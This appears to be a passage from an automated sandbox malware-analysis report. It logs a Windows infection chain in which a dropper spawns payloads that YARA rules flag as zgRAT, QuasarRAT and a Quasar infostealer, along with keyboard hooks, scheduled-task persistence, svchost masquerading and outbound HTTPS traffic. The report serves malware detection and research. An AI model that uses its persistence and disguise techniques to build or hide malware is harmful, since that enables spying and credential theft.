                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59071 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 58984 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59079 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59390 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58992
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59087 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58984
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59214
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59087
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59079
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59214 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 58992 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59071
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59390
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:58984 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 15.235.80.22:443 -> 192.168.2.5:58992 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59071 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59087 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.18.11.5:443 -> 192.168.2.5:59214 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000003084000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_44e01a3a-0

                                E-Banking Fraud

                                barindex
                                Source: Yara matchFile source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 2020, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp2E7A.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp2E6A.tmpJump to dropped file

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                System Summary

                                barindex
                                Source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                                Source: 34.3.espartu.exe.11cca80.0.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                                Source: 34.3.espartu.exe.12121c0.1.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                                Source: mlk3kK6uLZ.exeStatic PE information: section name:
                                Source: mlk3kK6uLZ.exeStatic PE information: section name: .idata
                                Source: mlk3kK6uLZ.exeStatic PE information: section name:
                                Source: axplong.exe.0.drStatic PE information: section name:
                                Source: axplong.exe.0.drStatic PE information: section name: .idata
                                Source: axplong.exe.0.drStatic PE information: section name:
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C386970 GetModuleHandleW,NtQueryInformationProcess,18_2_6C386970
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeFile created: C:\Windows\Tasks\Hkbsse.job
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009C4CD02_2_009C4CD0
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A030482_2_00A03048
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D882_2_00A18D88
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D342_2_00A18D34
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D382_2_00A18D38
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D3C2_2_00A18D3C
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D182_2_00A18D18
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D182_2_00A18D18
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D202_2_00A18D20
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A18D3C2_2_00A18D3C
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009F7D632_2_009F7D63
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A06EE92_2_00A06EE9
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009C4AD02_2_009C4AD0
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A0763B2_2_00A0763B
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A02BB02_2_00A02BB0
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A087002_2_00A08700
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_00A0775B2_2_00A0775B
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AA28804_2_00AA2880
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AC90004_2_00AC9000
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00ABB1BC4_2_00ABB1BC
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB12FC4_2_00AB12FC
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AA33204_2_00AA3320
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB9E364_2_00AB9E36
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB56104_2_00AB5610
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB16444_2_00AB1644
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AC37554_2_00AC3755
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004023205_2_00402320
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004050C05_2_004050C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004204705_2_00420470
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040FCF05_2_0040FCF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419D195_2_00419D19
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041951B5_2_0041951B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004156355_2_00415635
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041DEC35_2_0041DEC3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404F005_2_00404F00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040CF8F5_2_0040CF8F
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_02C82C489_2_02C82C48
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_02C808689_2_02C80868
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_02C808789_2_02C80878
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_02C82C389_2_02C82C38
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A4C189_2_053A4C18
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A37B89_2_053A37B8
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A37A99_2_053A37A9
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A17FC9_2_053A17FC
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A53109_2_053A5310
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_053A53519_2_053A5351
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeCode function: 9_2_075E09209_2_075E0920
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_029EDC7411_2_029EDC74
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_063967D811_2_063967D8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0639A3E811_2_0639A3E8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0639A3D811_2_0639A3D8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_06396FF811_2_06396FF8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_06396FE811_2_06396FE8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0798436311_2_07984363
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0798201011_2_07982010
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_07980B9811_2_07980B98
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_07980BA811_2_07980BA8
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_079812B011_2_079812B0
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0798200311_2_07982003
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 11_2_0798004011_2_07980040
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38697018_2_6C386970
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38130018_2_6C381300
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C386FC018_2_6C386FC0
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38100018_2_6C381000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38F0D018_2_6C38F0D0
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C386DD018_2_6C386DD0
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C39B23518_2_6C39B235
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38275018_2_6C382750
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_0166241018_2_01662410
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01660FD818_2_01660FD8
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01665E8818_2_01665E88
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_0166236518_2_01662365
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01662D0818_2_01662D08
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01662CF818_2_01662CF8
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01660F5918_2_01660F59
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01665E6218_2_01665E62
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_01660EE518_2_01660EE5
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: String function: 6C390350 appears 33 times
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: String function: 00AAB960 appears 54 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00407D30 appears 55 times
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472
                                Source: mlk3kK6uLZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                                Source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                                Source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: mlk3kK6uLZ.exeStatic PE information: Section: ZLIB complexity 0.9985004696038251
                                Source: mlk3kK6uLZ.exeStatic PE information: Section: lkmvftub ZLIB complexity 0.9946698819423253
                                Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9985004696038251
                                Source: axplong.exe.0.drStatic PE information: Section: lkmvftub ZLIB complexity 0.9946698819423253
                                Source: leg222[1].exe.2.drStatic PE information: Section: .data ZLIB complexity 0.9956070909468439
                                Source: leg222.exe.2.drStatic PE information: Section: .data ZLIB complexity 0.9956070909468439
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, yBQYZwZvTcsA2wxVsly.csCryptographic APIs: 'CreateDecryptor'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, yBQYZwZvTcsA2wxVsly.csCryptographic APIs: 'CreateDecryptor'
                                Source: 34.3.espartu.exe.11cca80.0.raw.unpack, PBE.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 34.3.espartu.exe.11cca80.0.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                                Source: 34.3.espartu.exe.12121c0.1.raw.unpack, PBE.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 34.3.espartu.exe.12121c0.1.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@65/23@4/100
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMutant created: \Sessions\1\BaseNamedObjects\Global\110000000011111
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeMutant created: NULL
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6472
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeMutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\80038a66-0dbb-4135-8eb1-4ce5a34ce41b
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5900:64:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeMutant created: \Sessions\1\BaseNamedObjects\DfqPKn01iO
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile created: C:\Users\user\AppData\Local\Temp\8254624243Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
